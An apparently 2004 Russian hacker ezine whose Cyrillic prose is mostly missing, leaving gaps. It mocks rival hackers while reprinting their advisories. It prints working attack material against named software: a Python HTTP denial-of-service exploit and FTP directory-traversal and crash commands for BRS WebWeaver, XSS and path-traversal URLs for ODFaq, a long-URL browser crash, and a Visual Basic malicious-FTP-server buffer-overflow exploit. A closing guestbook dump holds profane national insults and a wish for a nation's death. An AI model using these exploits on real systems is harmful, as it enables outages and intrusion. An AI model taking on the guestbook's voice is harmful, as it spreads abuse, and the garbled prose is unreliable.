:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::       :::::::::  :::::::::: ::::::::::   :::      ::::::::  :::::::::: :::::::::       :::::::: :::
:+:      :+:    :+: :+:        :+:        :+: :+:   :+:    :+: :+:        :+:    :+:     :+:    :+: :+:
+:+     +:+    +:+ +:+        +:+       +:+   +:+  +:+        +:+        +:+    +:+     +:+         +:+
+#+    +#+    +:+ +#++:++#   :#::+::# +#++:++#++: +#+        +#++:++#   +#+    +:+     +#++:++#+    +#+
+#+   +#+    +#+ +#+        +#+      +#+     +#+ +#+        +#+        +#+    +#+     +#+    +#+    +#+
#+#  #+#    #+# #+#        #+#      #+#     #+# #+#    #+# #+#        #+#    #+#     #+#    #+#     #+#
### #########  ########## ###      ###     ###  ########  ########## #########       ########       ###
#######################################################################################################
###.f.u.c.k...f.u.c.k...f.u.c.k...f.u.c.k...f.u.c.k...f.u.c.k...f.u.c.k...f.u.c.k...f.u.c.k...f.u.c.###
#######################################################################################################



+++
,      - FUCK XbIP, FUCK fUkR ``sekurity team'', FUCK
every1  who  think that he is da ruffiest k-otik fuxor on da earth planet!! FUCK
lamehatz  and  gayhatz  who  claims  they  are  blackhatz, FUCK scene clownz and
other beotchez!!

euronymous
+++



#######################################################################################################
###  I N T R O                      ###
#######################################


    ,        ,    .
  euronymous     T ,       
  .    ,        .
           1        
,        -  defaced staff.     
   .     ,       -  
.   ,   html,        . 

    Enjoy the magazine...




  :

(0) Intro                       by new defaced staff
(1) Scene Newz                  by new defaced staff
(2) The top 5 lame advizoryez   by new defaced staff
(3) Defaced staff demystified   by new defaced staff
(4) Writing overflowz in VB     by euronymous
(5) Outro 


  defaced: defaced-zine@mail.ru




#######################################################################################################
###  S C E N E  N E W Z             ###
#######################################


:
[0] Defaced_5 - the lamezt zine ever
[1]    
[2] defaced fuckazine  
[3] rus-sex.org CHANGELOG
[4] Gothic Pictures of euronymous



[0] Defaced_5 - the lamezt zine ever

      defaced   .      
( ).        .    ,    
 ~el8      .    m00,      
.  -   pr0j3ct m4yh3m,       ,   
-  Defaced3.     ~el8      .  
''      ...

         .      ,   
d3f4c3d5t4ff          - rus-sec.org.   
      .     non-dosclosure,   
  ( ,    )       .   
 .   ''          
  top5 lame advisoryez. 

       .      'scenenewz'  
      ( nerf.ru).   Phrack63  .
     Sebek      p63. "    
 / Sebek" - lol ))          . Sebek   
/,  honeypot ))). ",    phrack.nl    
" -   lol ))   phrack.nl   ,     
phrack.unixchicks.com.    ,    phrack: www.el8.nl/p63.tar.gz ;) 

 Defaced_5    ,  :   
  "writing overflowz in python" -         unix. 
  .     python     .
    ,         
.      "Writing overflowz in VB"  defaced6.
  "icmp-wakeup backdoorz takeover" -      ''   m00-bdpack.
   ?  defaced   .     "  
,      warez". ,    ,   
     . 
  "traderz [ ripperz ] howto" -  Pirog   .
  "lkm rootkitz trickz" -      .
  "scene not dead" - d3f4c3d5t4ff      " RU-". 
   ,     ,      .  
      "  " FDS  Dark Deamon.     
irc- ,      .
  "fast unix trojanin"-     . 
  "the top five lame shellcodez" -      euronymous. 
  "openvms small guide" -      - "        
openvms.       x25zine,   nightfall." -  .   .
  "snort ids book" -   ~el8    !( chapter sixteen).  
 el8,  T       amazon.com.    
   ,         .    ~el8 
 ! (btw.      el8. ,    pr0j3ct m4yh3m).
  "socket coding on asm/x86" -        ...
  "just'a doom" -  ,   d3f4c3d5t4ff     , 
   doom.
  "the clownz in cow skin" -      .

PS.  
    Defaced_5, euronymous      defaced staff. 




[1]    

Pirog,   ptzhack,   ,    d3f4c3d5t4ff,  
"Ripperz howto"  defaced5,        carderplanet.com

Pirog


  ^^^^
 [ X ] 

: 06.05.2003
: 86
N 10732

       .
(   carderplanet  )

 :   12, 2004 1:15 am   
    fingerprints
  ,   .
     Secuerity team   !
 vmware   !
   VPN ...
_________________
irc.x25.net.ru
#hack.ru

 :   10, 2004 2:55 am  
    >.........
_________________
irc.x25.net.ru
#hack.ru

 :  Dec 09, 2003 11:58 pm    
   !          
......    ......    
(   , );]]]]     ........
_________________
irc.x25.net.ru
#hack.ru



[2] defaced fuckazine  

 defaced_5 euronymous ,    ""    clane,  
  defaced.              
 shoutcast,      defaced_3 ))

    euro     )).    15 
       .     ,  
    ,       defaced...

,           . 
      defaced   .   defaced_3  !
,   ,      ~el8.3.   :

.~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~.
|#$%$#@%!$@^%@$^!@#@#%!@#$^@!$#^%!@$#$%@!#$%^!@$^%#$^!@$%@#@^$#!@#|
|#:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::#|
|#::'####::::::'########:'##::::::::'#######::'##:'#######:'##:::#|
|#:'##  ##:'##: ##.....:: ##:::::::'##.... ##: #::...... #:: #:::#|
|#:..::. ####:: ##::::::: ##::::::: ##:::: ##: #:::::::: #:: #:::#|
|#::::::....::: ######::: ##:::::::: #######:: #::: ######:: #:::#|
|#::::::::::::: ##...:::: ##:::::::'##.... ##: #:::..... #:: #:::#|
|#::::::::::::: ##::::::: ##::::::: ##:::: ##: #:::::::: #:: #:::#|
|#::::::::::::: ########: ########:. #######:: ##: #######: ##:::#|
|#:::::::::::::........::........:::.......:::..::.......::..::::#|
|#:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::#|
|#@#$!@%$^%@!$#%$@%^#!^$#@^%!@%#%!@#^$%@!^$#$^!@$^#$^^%@%@#!@#!@$#|
|#:::::::::::::::::FUCKN UP WHITEHATS SINCE 1998:::::::::::::::::#|
|#@#$!@%$^%@!$#%$@%^#!^$#@^%!@%#%!@#^$%@!^$#$^!@$^#$^^%@%@#!@#!@$#|
`~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~'
    
.~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#.
|#$%$#@%!$@^%@$^!@#@#%!@#$^@!$#^%!@$#$%@!#$%^!@$^%#$^!@$%@#@^$#!@#@%!$@^!@#@#%!@#|
|#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::#|
|#::#######::#######:#######:::###:::#######:#######:#######:::###:#######:###::#|
|#::##::::##:##::::::##:::::::##:##::##::::::##::::::##::::##::#::::::::##:::#::#|
|#::##::::##:##::::::##::::::##:::##:##::::::##::::::##::::##::#::::::::##:::#::#|
|#::##::::##:#######:#######:#######:##::::::#######:##::::##::#:::#######:::#::#|
|#::##::::##:##::::::##::::::##:::##:##::::::##::::::##::::##::#::::::::##:::#::#|
|#::##::::##:##::::::##::::::##:::##:##::::::##::::::##::::##::#::::::::##:::#::#|
|#::#######::#######:##::::::##:::##:#######:#######:#######:::###:#######:###::#|
|#::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::#|
|#@#$!@%$^%@!$#%$@%^#!^$#@^%!@%#%!@#^$%@!^$#$^!@$^#$^^%@%@#!@#!@$#%!@#^$%@!^$%$@#|
|#::::::::::::::::::::RUSSIAN UNDERGROUND COMMUNITY 2003::::::::::::::::::::::::#|
|#$%$#@%!$@^%@$^!@#@#%!@#$^@!$#^%!@$#$%@!#$%^!@$^%#$^!@$%@#@^$#!@#@%!$@^!@#@#%!@#|
.~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#. 



[3] rus-sex.org CHANGELOG

www.rus-sec.org -   d3f4c3d5t4ff,      security , 
    . , -  "installing additional protection"    
 $30. Security   $30-40.     $80-100.  
    rus-sec.org,         .

[19.03.2004] News:
1)     Defaced.     ,    
    . !!!DOWNLOAD!!!
2)  ,    T.     : 
   shellcodes, services, about.
   ^^^^^^^^^^^^^^

          shellcodes   services, 
   ...



[4] Gothic Pictures of euronymous

    :
http://www.vampirefreaks.com/pics/euronymous/






#######################################################################################################
###  The top 5 lame advizoryez      ###
#######################################


     ,  d3f4c3d5t4ff      !   
         ,      defaced 
     ...        
    ex- defaced:

0. XSS and Path Disclosure in UPB
1. BRS WebWeaver fool disclosure (    25 ! mega lol)
2. BRS WebWeaver advisory 25
3. XSS in od fag
4. childish buffer overflow





=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: XSS and Path Disclosure in UPB
product: Ultimate PHP Board (UPB) final beta 1.0
vendor: http://www.webrc.ca/php/upb.php
risk: middle
date: 12/7/2k2
discovered by: euronymous /F0KP /HACKRU Team
                                ^^^^^^^
     [  HACKRU CREW?   ! ]                          
advisory url: http://f0kp.iplus.ru/bz/009.txt
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
              
description
-----------


     [     -   XSS    
         .    ... ]



ps. all of this issues applied to previus versions upb.

shouts: HACKRU Team, DWC, DHG, Spoofed Packet, 
                     ^^^^^^^^^
     [        ? ]     
     
all russian security guyz!! and kate for she is kewl girl ))
^^^^^^^^^^^^^^^^^^^^^^^
     [        security-... ]    
     
fuck_off: slavomira and other dirty ppl in *.kz


================
im not a lame,
       ^^^^
     [   ...     ]
not yet a hacker
      ^^^^^
     [   !    HACKRU.. ]
================





=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: BRS WebWeaver: full disclosure
                      ^^^^^^^^^^^^
     [   full-disclosure?  !  
       fool-disclosure security  ...    ]
       
product: BRS WebWeaver 1.03
vendor: http://www.brswebweaver.com
risk: high
date: 31/03/2k3
tested platform: Windows 98 Second Edition
                 ^^^^^^^^^^
     [   . ]
discovered by: euronymous /F0KP
advisory urls: http://f0kp.iplus.ru/bz/019.en.txt
http://f0kp.iplus.ru/bz/019.ru.txt
contact email: euronymous@iplus.ru
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=

Issues
------

1. Dos Device Path vulnerability in FTP Server
2. Long URL DoS in HTTP Server
3. Weak Encryption Sheme
4. Remote System Information Gathering
5. Path Disclosure in FTP Server
6. Directory Traversal in FTP Server


1. Dos Device Path vulnerability in FTP Server
----------------------------------------------

i have found, that FTP server doesnt checks path, typed by user.
malicious local user can crash FTP (and HTTP also) server on
non-patched Windows98 machine.

just type this command in WebWeaver ftp session:

cd /aux/aux/

After this server goes down..
Solutions:
1) Apply corresponding patch for your windows
2) Wait for new version of WebWeaver
3) Remove this crap at all ))
          ^^^^^^^^^
     [     ? ]


.... CRAP REMOVED AT ALL ....


4. Remote System Information Gathering
--------------------------------------

Any remote user can get many useful information about
system, where BRS WebWeaver is installed. If within
installation procedure test cgi scripts was installed
[in default], then it will enough to go to this url:

http://hostname/scripts/testcgi.exe

     [     ? ]


}--------------- start of testcgi.exe output ---------------{

CGI Test Program
Arguments To Testcgi

Argument 1 :

Environment Variables

     [    CGI    testcgi.exe
          euronymous     . 
         ,   . 
           ,   ...  ]                     

}--------------- end of testcgi.exe output ---------------{


Solution: Remove this script from /scripts/ directory.

     [        ... ]
     
5. Path Disclosure in FTP Server
--------------------------------

I wrote about this vulnerability in v1.01 of WebWeaver
already: http://f0kp.iplus.ru/bz/012.en.txt
It was published in Bugtraq mailing list, but in v1.03

     [ euronymous     BRS WebWever  
           ... ]
       
this flaw else doesnt was fixed.

     [ .     ... ]


}-------------- sample session -----------{

220 BRS WebWeaver FTP Server ready.
User (********.***.*****.***:(none)): 123
331 Password required for 123.
Password:
230 User 123 logged in.
ftp> pwd
257 "/" is current directory.
ftp> mkdir test
257 '/test': directory created.
ftp> mkdir test
550 'c:\ftp\test': can't create directory.
ftp> rmdir test
250 '/test': directory removed.
ftp> rmdir test
550 'c:\ftp\test': no such directory.
ftp>

}-------------- sample session -----------{
       ^^^^^^^^^^^^^^^^^^^
     [        ftp ] 

So, if user make attempt to create already existent
directory or remove unexistent directory, then
Ftp server will output full system path.

Solutions:
1) Wait for new version of WebWeaver
2) Remove this crap at all ))

6. Directory Traversal in FTP Server
------------------------------------

I wrote about this vulnerability in v1.01 of WebWeaver
already: http://f0kp.iplus.ru/bz/012.en.txt
It was published in Bugtraq mailing list, but in v1.03

     [          ? ]
     
this flaw else doesnt was fixed.
           ^^^^^^^^^^^^^^^^
     [     )) ]


}-------------- sample session -----------{

220 BRS WebWeaver FTP Server ready.
User (********.***.*****.***:(none)): 123
331 Password required for 123.
Password:
230 User 123 logged in.
ftp> pwd
257 "/" is current directory.
ftp> mkdir ../test
257 '/..\test': directory created.
ftp> rmdir ../test
250 '/..\test': directory removed.
ftp> mkdir ../windows/test
257 '/..\windows\test': directory created.
ftp> rmdir ../windows/test
250 '/..\windows\test': directory removed.
ftp>

}-------------- sample session -----------{
             ^^^^^^^^^^^^^^
     [          ftp ... ]

How you can see any user can exploit this traversal
bug for creating and removing directories outside
ftp_root. But user cannot use more useful commands
like `ls', `dir'.

     [     ..   
             )) ]

Solutions:
1) Wait for new version of WebWeaver
2) Remove this crap at all ))

shouts: R00tC0de, DWC, DHG, HUNGOSH, security.nnov.ru, 
                                     ^^^^^^^^^^^^^
     [        iDefense!! ]
     
all russian security guyz!! to kate especially ))
                            ^^^^^^^^^
     [ . russian security guy   kate... 
          -?  ]
       
f*ck_off: slavomira and other dirty ppl in *.kz $#%&^! 
k0dsweb f*cking team

================
im not a lame,
   ^^^^^^^^
     [     ... ]
not yet a hacker
  ^^^^^^^^
     [        ! ]
================



     ,     BRS WebWeaver
advisory     (    ).
   ?         .   
         BRS WebWeaver  . 


=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: BRS WebWeaver: POST and HEAD Overflaws
product: BRS WebWeaver v1.04 and prior [ i guess ]
vendor: www.brswebweaver.com
risk: high
date: 05/25/2k3
tested platform: Windows 98 Second Edition
discovered by: euronymous /F0KP
advisory urls: http://f0kp.iplus.ru/bz/025.en.txt
               http://f0kp.iplus.ru/bz/025.ru.txt
                                      ^^^^^
     [       . MEGA LOL! ] 
contact email: euronymous@iplus.ru
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=

description
-----------

more b0fs in Webweaver. sending 32700 charz in POST
or HEAD request will crash http server.

when send 32699 charz with fadvWWhtdos.py, webweaver
print 403 error. when sending >= 32700 charz, server
will print `Unable to insert string' error and you
have to restart it.

}------- start of fadvWWhtdos.py ---------------{

#! /usr/bin/env python
###
# WebWeaver 1.04 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fadvWWhtdos.py
########

import sys
import httplib

met = raw_input("""
What kind request you want make to crash webweaver?? [ HEAD/POST ]:
""")
target = raw_input("Type your target hostname [ w/o http:// ]: ")
spl = "f0kp"*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, "/"+spl)
r1 = conn.getresponse()
print r1.status

}--------- end of fadvWWhtdos.py ---------------{
        ^^^^^^^^^^^^^^^
     [         
         "writing overflowz in python"    ]

shouts: DWC, DHG, NetPoison, HUNGOSH, security.nnov.ru,
N0b0d13s Team and all russian security guyz!!
                  ^^^^^^^^^^^^^^^^^^^^^^^^
     [    security-... ]
     
to kate especially ))
hates: slavomira and other dirty ppl in *.kz $#%&^!
k0dsweb lamers team == yeah, i really __HATE__ yours!!       

================
im not a lame,
not yet a hacker
================ 



    ex 2 defaced staff nimber. , nimber -  . 
 2  ZUD  ,   2  defaced staff  (   6?).
     .     Wolf   
 ZUD TEAM,     ... 


#################################
# ZUD SECURITY TEAM PRESENT     #
################################                               
#    bug found by nimber        #
# Email : nimber@designer.ru    #
# Site:    www.zudteam.org      #
# HomePage: www.nimber.plux.ru  #         
#          9.08.2003            #
################################
Script: ODFaq 
Versions: 1.21b
Web Site: www.oodie.com
Bug: Multiple bugs.
1) Cross Site Scripting. JS/HTML code injection.
Exploit(exaple): 
www.server.com/odfaq2/adminfaq.php3?action=edit_section&cat=<iframe%20src="C:\"%20width=400%20height=400>
2) Directory traversal.
Exploit(exaple): 
www.server.com/odfaq2/adminfaq.php3?action=edit_section&cat=../../
                                                          ^^^^^^^
     [  .... ]
3)Reading of any file.
Exploit(exaple): 
www.server.com/odfaq2/adminfaq.php3action=edit_section&cat=../files.htm
                                      ^^^^^^^
     [ .        3... ]
4) At attempt to open a nonexistent file, there is a mistake.
Exploit(exaple): 
Warning: stat failed for /home/home/htusfrdm/www/odfaq2/data/ (errno=2 - No such file or directory) in
/home/home/htusfrdm/www/odfaq2/adminfaq.php3 on line 74
#################################
#GreetZ:,DWC,RushTeam,    #
        ^^^^^^
     [       !!!    
            security ...  ]
#Gipshack,Void,DHG and          #
#all Russian Security Team.     #
  ^^^^^^^^^
     [    ... ]
#################################




 ______________________________________________________________
/###############################################################\
# ZUD SECURITY TEAM PRESENT     #                              #:
################################################################:
#    bug found by nimber        #                              #:
#                               #      (0_0(0_o)0_o)           #:
#  Email : nimber@mail.ru       #                              #:
#                               #     www.zudteam.org          #:
#                               #                              #:
################################################################:
======================\\                                        :
Advisory Information: //----------------------------------------o
=====================//                                         :
Name               : NetSurf                                    :
Versions           : 3.02 (and all?)                            :
Platform           : Windows                                    :
Web Site           : www.klodware.narod.ru                      :
                     ^^^^^^^^^^^
     [  ))        ,
          12   )))  ]
Severity           : High                                       :
----------------------------------------------------------------o
======================\\---------------------------------------/
Overview:             // Buffer Overflow in NetSurf 3.02      /
=====================//______________________________________/
                                                            o
Bug: Buffer Overflow.                                       |
Exploit(exaple):                                            |
Crash browser by sending long http request.                 |
http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|
^^^^^^^^^
     [   .... ]
____________________________________________________________o
____________________________________________________________|
Gr33tZ: void.ru,RusH Team,m00 security,eXploit.ru,LWTeam,   |
                          ^^^^^^^^^^
      [      ... 
            .... ]
F0K Project,Free-Crew, 3APA3A                               |
                        ^^^^^
    [   ... ]
___________________________________________________________//




         ,        
.         .,      "euronymous 
security" ( "gay anal sex"),     www.rus-sec.org 


#######################################################################################################
###  Defaced staff demystified      ###
#######################################


           ,     defaced staff. 
    ! 

0. euronymous -    defaced.    XSS   . 
       unix,       .   
   "  "  "writing overflowz in python".     euronymous:  
         .     ,    
     .       ...
1. nimber -       .     
     windows     .  2  ZUD Security team.
2. Pirog -      irc   .   . 
    "Traderz-ripperz HOWTO".    "fresh private m00 0day warez"  
     XSpider.  !
3. eX0Rc157(  JLx[ZUD]) -      ,    
       narod.ru.     linuxassembly.org   ( 
   defaced).   zud secteam      m00,    -  
      - . 
4. +   \     ,      .




#######################################################################################################
###   Writing overflowz in VB       ###
#######################################


NOTE FROM THE EDITOR: euronymous       defaced.

                           WRiTiNG 0VERFL0WZ iN ViZUAL bAZiC 
                           =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

    ??  : -,       
 Visual Basic,       .      -  
iglooftp   Peter Winter-Smith,       .    
 XSpider  UST-CGISCANER. -,   ,      
  ,    ,         
        `` ''       
  ,      -  mandrake linux  
    ``buffer overflow for kidz'',    .

 Visual Basic??    ,      ``    
 ''     .   duffy d4rk   ``   qbasic?'',   
:    QBASIC          !!!    
      ,     Positive Tehnologies  ,  
,  ,  XSpider  Visual Basic,     .

        ,       -    
  .         ,    
   .


' BRS WebWeaver 3xpl0it f0r defaced6 3z1n33
' ViZUAL bAZiC 0VERFL0WZ pAp3r
' 
' PR1VAT3!! PR1VAT3!! PR1VAT3!! PR1VAT3!!
' PR1VAT3!! PR1VAT3!! PR1VAT3!! PR1VAT3!!
' UNPUBL1SH3D 5H1T!! D0 N0T D1STR1BUT3 U FUCKR
'
' ADV1Z0RY URLZ:
' http://f0kp.iplus.ru/advisorys/webweaver01.txt
' http://f0kp.iplus.ru/advisorys/webweaver02.txt
' http://f0kp.iplus.ru/advisorys/webweaver03.txt
' http://f0kp.iplus.ru/advisorys/webweaver04.txt
' http://f0kp.iplus.ru/advisorys/webweaver05.txt
' http://f0kp.iplus.ru/advisorys/webweaver06.txt
' http://f0kp.iplus.ru/advisorys/webweaver07.txt
' http://f0kp.iplus.ru/advisorys/webweaver08.txt
' http://f0kp.iplus.ru/advisorys/webweaver09.txt
' http://f0kp.iplus.ru/advisorys/webweaver10.txt
' http://f0kp.iplus.ru/advisorys/webweaver11.txt
' http://f0kp.iplus.ru/advisorys/webweaver12.txt
' http://f0kp.iplus.ru/advisorys/webweaver13.txt
' http://f0kp.iplus.ru/advisorys/webweaver14.txt
' http://f0kp.iplus.ru/advisorys/webweaver15.txt
' http://f0kp.iplus.ru/advisorys/webweaver16.txt
' http://f0kp.iplus.ru/advisorys/webweaver17.txt
' http://f0kp.iplus.ru/advisorys/webweaver18.txt
' http://f0kp.iplus.ru/advisorys/webweaver19.txt
' http://f0kp.iplus.ru/advisorys/webweaver20.txt
' http://f0kp.iplus.ru/advisorys/webweaver21.txt
' http://f0kp.iplus.ru/advisorys/webweaver22.txt
' http://f0kp.iplus.ru/advisorys/webweaver23.txt
' http://f0kp.iplus.ru/advisorys/webweaver24.txt
' http://f0kp.iplus.ru/advisorys/webweaver25.txt
'
' N0N-D1ZCL0ZUR3 N0N-D1ZCL0ZUR3 N0N-D1ZCL0ZUR3
' N0N-D1ZCL0ZUR3 N0N-D1ZCL0ZUR3 N0N-D1ZCL0ZUR3
'
' T3ZT3D 0N Windows 98 s3ck0nd 3d1ti0n
' 

Private Sub Command3_Click()
On Error GoTo errhlp
For x = 1 To 1020
pad = pad & Chr(&H41)
Next x

'l33t sh3llc0d3 c0d3d by JLx[ZUD]
'firzt publ1sh3d in defaced_3
shellcode = Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & _
Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & _
Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & _
Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) & Chr(&H41) 

ebp = "FUCK"
eip = Chr(Val("&H" & Text5.Text)) & Chr(Val("&H" & Text4.Text)) & Chr(Val("&H" & _
Text3.Text)) & Chr(Val("&H" & Text2.Text))
exploit = pad & ebp & eip & shellcode
Winsock1.SendData "220 " & exploit & vbCrLf
Exit Sub
errhlp:
If Err.Number = 40006 Then
MsgBox "No connection made when data was sent.", , "Error"
End If
Winsock1.Close
Winsock1.LocalPort = 21
Winsock1.Listen
Text1.Text = ""
End Sub

Private Sub Form_Load()
Winsock1.LocalPort = 21
Winsock1.Listen
End Sub

Private Sub Winsock1_Close()
Text1.Text = "Closed!"
End Sub

Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
If Winsock1.State <> sckClosed Then Winsock1.Close
Winsock1.Accept requestID
Text1.Text = "Connected!"
End Sub



     ,         ,   
     ,     :
http://www.packetstormsecurity.nl/0307-exploits/iglooftppro.zip



#######################################################################################################
###  O U T R O                      ###
#######################################


"Defaced   ,   .   ,   !" (c)  

           defaced.    
    d3f4c3d5t4ff  security-,   
   scriptkiddie   (     ).   
         .

               -
.         ?     
nimber  euronymous,      XSS .    
      .    ,  T    
   .    !


 - New defaced staff, 30  2004




56. : hofman , E-Mail: hofman@network.com, : huh? ,
Home Page URL: none 
: 
I see that al russian hackers are in script kiddie mode. 
sad but true. all ur so called cool hacks are no more 
than bullshit. ho and play with some trojans babyies. 
- Monday, February 25, 2002 at 13:36:27 (MSK) 

55. : aLph4Num3Ric , E-Mail: alph4num3ric@crackdealer.com, 
: to hofamn: dude just fuck off we didn't give 
a fuck what you think about us... 
- Monday, February 25, 2002 at 18:13:31 (MSK) 

54. : hofman , E-Mail: billy@microsoft.com, : fuck ,
Home Page URL: http://shit 
: As i said ur buch of sucking script kiddies in 3 world country 
- Wednesday, February 27, 2002 at 14:03:30 (MSK) 

53. : aLph4Num3Ric , E-Mail: alph4num3ric@crackdealer.com, 
: to sucker hosfman - listen bitch, shut your fucking mouth, 
u fucking AMERICAN bitch im gana fuck you up next time you come here 
ASSHOLE YOU FUCKING moron russia aint' 3 world country u stupid bitch...fucker 
- Wednesday, February 27, 2002 at 20:14:30 (MSK) 

52. : voodoo ,
: Don`t be angry alph4 - he`s just another stupid american 
sucker. Yes, yes, exactly ANOTHER, cuz they are all stupid in this 
fuckin country. The Americans - most stupid people in the world. 
They like to think thet they are first, but... they are nothing. 
Russia has beter weapons, better scinse and better peoples, whio 
CAN THINK not only about money. America - is dead conuntry where 
living not humans, just BIOMASS. Thet`s all i can say. And u hofman 
just stupid sucker, whom can`t do anything like we, u r just envy...
Like all americans biomass. Fuck u all. Someday i will gladly watch, 
like all you fuckin` nation will die... 
- Wednesday, February 27, 2002 at 20:35:35 (MSK) 

51. : hofman , E-Mail: fuck@u.to, : aa ,
Home Page URL: http://miscrosoft.com 
: Heh suckaz, im not from USA. And russia is 666 world 
country. All u comunist asses, ur rotting there in ur own shitpile 
cause, all u can think off is vodka drinking. Stupid bunch of cript 
kiddies are all so called leet hackers of russia - the federation 
of morons. Fuck ur all russian suckers. 
- Saturday, March 02, 2002 at 16:15:28 (MSK) 

50. : voodoo ,
: Af first.This is another example of stupidity 
of west civilization. Hey buster, shut ur fucking mouth! 
U don`t know anything about russia, about it history, about 
many things! When u visit our country, only then u could say 
anything about it. At second - we are not script kiddies. U 
don`t know anything about our group. So please, if u want to say 
bullshit about somebody go to ur website (microsoft.com) :). 
- Sunday, March 03, 2002 at 11:54:36 (MSK) 

49. : Crazy Einstein ,
: to hofman: hmm...i can't understand only one thing.. 
if you don't like us...why are you here? -:) i think you are 
little boy who loves make shit and no more...so..fuck off you 
little creep. 
to voodoo & alfa: hi -:). slushaite hvatit na nego vnimanie 
obrashat'... 4to vi kak deti.. on sam potom otvalit..esli vi 
na ego frazi otve4at' ne budete... naher portit' nervi ot 
malenkogo zasranca..-:) 
- Sunday, March 03, 2002 at 12:20:15 (MSK) 

48. : hoffman , E-Mail: sdf@cff.com, : aaa ,
Home Page URL: http://www.russiasuck.com 
: davai davai russkije zasranci. all i can say 
bout ur country and i have been in your 3 world country is 
that all poeple there are completely stupid. 
- Monday, March 04, 2002 at 14:20:10 (MSK) 

47. : hoffman , E-Mail: aa, : aa ,
Home Page URL: http://z 
: why im here? cause i lough here bout ur stupidnes, 
and silliness. u cant do anything. ur so called defaces are only 
designed pages by ur own team. no defaces was made by u really. 
comon if ur so leet hackers then try to hack my site @ http://www.theprynce.com/ 
then we will see if u can do anything or just suck ur own disk, 
masturbate near mirror, and cry out loud that russia is cool 
country and ur leet d00dz 
- Monday, March 04, 2002 at 14:33:45 (MSK) 

45. : voodoo ,
: hey,hofman, if u don`t belive, that we had hacked 
this fuckin sites, just come to www.void.ru and look into deface archives. 
- Monday, March 04, 2002 at 21:32:38 (MSK) 

41. : hoffman , E-Mail: a, : a ,
Home Page URL: http://aa 
: void.ru another scriptkid site? 
get a life or something. 
- Thursday, March 07, 2002 at 11:33:48 (MSK) 


